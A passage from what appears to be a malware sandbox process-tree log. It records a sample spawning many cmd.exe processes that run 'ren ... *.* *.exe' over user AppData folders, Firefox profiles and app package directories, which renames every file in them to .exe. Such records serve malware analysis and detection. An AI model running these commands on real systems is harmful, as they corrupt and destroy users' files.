        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VDS6YA2E\*.*" "*.exe"
        5⤵
        
        PID:4880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\*.*" "*.exe"
        5⤵
        
        PID:2348
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\ESE\*.*" "*.exe"
        5⤵
        
        PID:4472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Low\*.*" "*.exe"
        5⤵
        
        PID:3540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\*.*" "*.exe"
        5⤵
        
        PID:2176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\*.*" "*.exe"
        5⤵
        
        PID:3624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\*.*" "*.exe"
        5⤵
        
        PID:4152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\*.*" "*.exe"
        5⤵
        
        PID:5076
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\*.*" "*.exe"
        5⤵
        
        PID:3832
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\*.*" "*.exe"
        5⤵
        
        PID:2852
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\*.*" "*.exe"
        5⤵
        
        PID:4280
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*.*" "*.exe"
        5⤵
        
        PID:5096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Backup\*.*" "*.exe"
        5⤵
        
        PID:3556
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:2928
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\*.*" "*.exe"
        5⤵
        
        PID:4324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\*.*" "*.exe"
        5⤵
        
        PID:3616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\8ldjzjqt.Admin\*.*" "*.exe"
        5⤵
        
        PID:4972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\*.*" "*.exe"
        5⤵
        
        PID:2228
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\cache2\*.*" "*.exe"
        5⤵
        
        PID:4396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\safebrowsing\*.*" "*.exe"
        5⤵
        
        PID:580
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\settings\*.*" "*.exe"
        5⤵
        
        PID:4316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\startupCache\*.*" "*.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\thumbnails\*.*" "*.exe"
        5⤵
        
        PID:4404
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\cache2\doomed\*.*" "*.exe"
        5⤵
        
        PID:3096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\cache2\entries\*.*" "*.exe"
        5⤵
        
        PID:3176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\settings\main\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\settings\main\ms-language-packs\*.*" "*.exe"
        5⤵
        
        PID:2000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\settings\main\ms-language-packs\browser\*.*" "*.exe"
        5⤵
        
        PID:4028
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5dqhm7h.default-release\settings\main\ms-language-packs\browser\newtab\*.*" "*.exe"
        5⤵
        
        PID:4676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\*.*" "*.exe"
        5⤵
        
        PID:1828
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:3108
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4392
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:4988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:1676
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:2932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:4416
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:4268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:392
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:5020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:3616
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4324
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3528
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:4700
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3172
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3388
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3848
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\*.*" "*.exe"
        5⤵
        
        PID:1052
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2184
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:3120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\*.*" "*.exe"
        5⤵
        
        PID:2856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows_ie_ac_001\*.*" "*.exe"
        5⤵
        
        PID:5112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:3648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:3544
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:4880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:3692
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:3660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:2616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:1748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:2672
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:2788
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\*.*" "*.exe"
        5⤵
        
        PID:4456
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\*.*" "*.exe"
        5⤵
        
        PID:872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:2624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:4780
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:2708
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:1888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:4000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:3648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:2200
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:2648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:2164
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:2748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:4516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:1540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:4404
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:1552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        5⤵
        
        PID:640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        5⤵
        
        PID:2624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        5⤵
        
        PID:2892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        5⤵
        
        PID:2708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        5⤵
        
        PID:2852
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\*.*" "*.exe"
        5⤵
        
        PID:3996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\*.*" "*.exe"
        5⤵
        
        PID:3484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        5⤵
        
        PID:3016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        5⤵
        
        PID:1876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\*.*" "*.exe"
        5⤵
        
        PID:2400
    - - C:\Windows\System32\cmd.exe
        
